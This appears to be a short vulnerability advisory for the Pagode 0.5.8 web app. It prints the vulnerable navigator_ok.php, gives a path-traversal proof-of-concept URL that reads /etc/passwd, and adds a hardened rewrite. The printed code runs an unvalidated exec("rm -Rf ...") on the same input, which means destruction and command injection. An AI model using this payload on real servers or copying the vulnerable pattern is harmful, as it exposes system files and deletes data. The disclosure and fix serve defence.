Pagode 0.5.8 (navigator_ok.php asolute) Remote File Disclosure
Discovered by: GolD_M = [Mahmood_ali]
Vulnerable code in /navigator/navigator_ok.php:
###################/navigator/navigator_ok.php###################
<?
session_cache_limiter('none');
session_start();
include ('…/includes/functions.php');
header("Content-Type: application/save-as");
header("Content-Length: $file_size");
header("Content-Disposition: attachment; filename=$file_name");
header("Content-Transfer-Encoding: binary");
readfile($asolute); // <----[+] $asolute comes from the request and is never validated
exec("rm -Rf $asolute");
?>
#################################################################
Exploit: [Path_Pagode]/navigator/navigator_ok.php?asolute=…/…/…/…/…/…/etc/passwd
Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & 020
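
Added example (not part of the original advisory and not Pagode's own code): one way to harden navigator_ok.php, confining the requested path to a single directory before it is read and replacing the exec("rm -Rf ...") call on the same variable with unlink(). The NAV_BASE_DIR value, the resolve_download() helper and reading the parameter from $_GET are assumptions.

```php
<?php
// Added example, not Pagode's code. NAV_BASE_DIR and resolve_download()
// are hypothetical names; reading $_GET['asolute'] is an assumption.
session_cache_limiter('none');
session_start();

// Assumption: the single directory that may hold downloadable files.
const NAV_BASE_DIR = '/var/www/pagode/downloads';

/**
 * Return the canonical path of $requested if it is a regular file
 * inside $baseDir, or null if it is anything else.
 */
function resolve_download(string $requested, string $baseDir): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() resolves "../" and symlinks; false means the file is missing.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // The canonical path must still sit under the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

$path = resolve_download((string) ($_GET['asolute'] ?? ''), NAV_BASE_DIR);
if ($path === null) {
    http_response_code(404);
    exit;
}

header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($path));
header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
header('Content-Transfer-Encoding: binary');
readfile($path);

// Replaces exec("rm -Rf $asolute"): no shell, and only the validated file.
unlink($path);
```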